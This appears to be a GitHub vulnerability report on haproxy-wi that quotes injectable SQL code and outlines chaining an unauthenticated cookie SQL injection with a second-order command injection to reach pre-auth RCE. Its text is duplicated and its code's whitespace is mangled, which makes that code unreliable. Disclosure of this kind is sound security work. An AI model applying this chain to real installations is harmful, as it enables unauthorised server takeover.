i found haproxy-wi in aws/digitalocean marketplace when i was looking for a solution to manage multiple reverse proxies, since it was opensource i peaked at how it works and found some critical issues when combined leading to pre-auth RCE
# SQL injections:
Inside /app/sql.py some SQL statements have user controlled input supplied directly into SQL queries
## Unauthenticated SQLi
when an attacker request any of the pages inside /app folder, authentication is checked via funct.check_login()
check_login() takes uuid cookie value and try to update expiration timestamp for the given uuid with sql.update_last_act_user(user_uuid.value)
defupdate_last_act_user(uuid):
cursor=conn.cursor()
session_ttl=get_setting('session_ttl')
ifmysql_enable=='1':
>sql=""" update uuid set exp = now()+ INTERVAL %s day where uuid = '%s' """% (session_ttl, uuid)
else:
>sql=""" update uuid set exp = datetime('now', '+%s days') where uuid = '%s' """% (session_ttl, uuid)
try:
cursor.execute(sql)
exceptExceptionase:
funct.out_error(e)
uuid cookie value is directly supplied into the query, so an unauthenticated attacker can perform a blind SQL injection to dump the database or extract a valid uuid to bypass authentication
## authenticated SQLi
One example of authenticated SQLi via reaching select_servers function
defselect_servers(**kwargs):
cursor=conn.cursor()
sql="""select * from servers where enable = '1' ORDER BY groups """ifkwargs.get("server") isnotNone:
sql="""select * from servers where ip='%s' """%kwargs.get("server")
ifkwargs.get("full") isnotNone:
sql="""select * from servers ORDER BY hostname """ifkwargs.get("get_master_servers") isnotNone:
sql="""select id,hostname from servers where master = 0 and type_ip = 0 and enable = 1 ORDER BY groups """ifkwargs.get("get_master_servers") isnotNoneandkwargs.get('uuid') isnotNone:
sql=""" select servers.id, servers.hostname from servers left join user as user on servers.groups = user.groups left join uuid as uuid on user.id = uuid.user_id where uuid.uuid = '%s' and servers.master = 0 and servers.type_ip = 0 and servers.enable = 1 ORDER BY servers.groups """%kwargs.get('uuid')
ifkwargs.get("id"):
sql="""select * from servers where id='%s' """%kwargs.get("id")
ifkwargs.get("hostname"):
sql="""select * from servers where hostname='%s' """%kwargs.get("hostname")
ifkwargs.get("id_hostname"):
sql="""select * from servers where hostname='%s' or id = '%s' or ip = '%s'"""% (kwargs.get("id_hostname"), kwargs.get("id_hostname"), kwargs.get("id_hostname"))
ifkwargs.get("server") andkwargs.get("keep_alive"):
sql="""select active from servers where ip='%s' """%kwargs.get("server")
try:
cursor.execute(sql)
exceptExceptionase:
funct.out_error(e)
else:
returncursor.fetchall()
there's multiple injection points from user supplied input here
haproxy_sock_port is stored in settings table, and an authenticated user can change it from https://[%HOST%]/app/users.py#settings then calls options page to call that function and execute arbitrary system command
most cmds in different functions are prone to command injection or second order from settings stored in the database and user controlled
# Conclusion
combining both unauthenticated SQLi to grab a valid uuid and bypass authentication, then use command injection an unauthenticated user can achieve pre-auth RCE
The text was updated successfully, but these errors were encountered:
i found haproxy-wi in aws/digitalocean marketplace when i was looking for a solution to manage multiple reverse proxies, since it was opensource i peaked at how it works and found some critical issues when combined leading to pre-auth RCE
# SQL injections:
Inside
/app/sql.pysome SQL statements have user controlled input supplied directly into SQL queries## Unauthenticated SQLi
when an attacker request any of the pages inside
/appfolder, authentication is checked viafunct.check_login()check_login()takesuuidcookie value and try to update expiration timestamp for the given uuid withsql.update_last_act_user(user_uuid.value)uuidcookie value is directly supplied into the query, so an unauthenticated attacker can perform a blind SQL injection to dump the database or extract a valid uuid to bypass authentication## authenticated SQLi
One example of authenticated SQLi via reaching select_servers function
there's multiple injection points from user supplied input here
one way to reach this is from hapservers.py
this could be exploited by least privilege account such as guest
There's some more functions supplying user input to SQL queries
# Command injection:
Inside
/app/funct.pyand/api/api_funct.pysome commands executed are supplied with user inputone of many examples of a second order command injection here:
haproxy_sock_port is stored in settings table, and an authenticated user can change it from
https://[%HOST%]/app/users.py#settingsthen calls options page to call that function and execute arbitrary system commandmost cmds in different functions are prone to command injection or second order from settings stored in the database and user controlled
# Conclusion
combining both unauthenticated SQLi to grab a valid uuid and bypass authentication, then use command injection an unauthenticated user can achieve pre-auth RCE
The text was updated successfully, but these errors were encountered: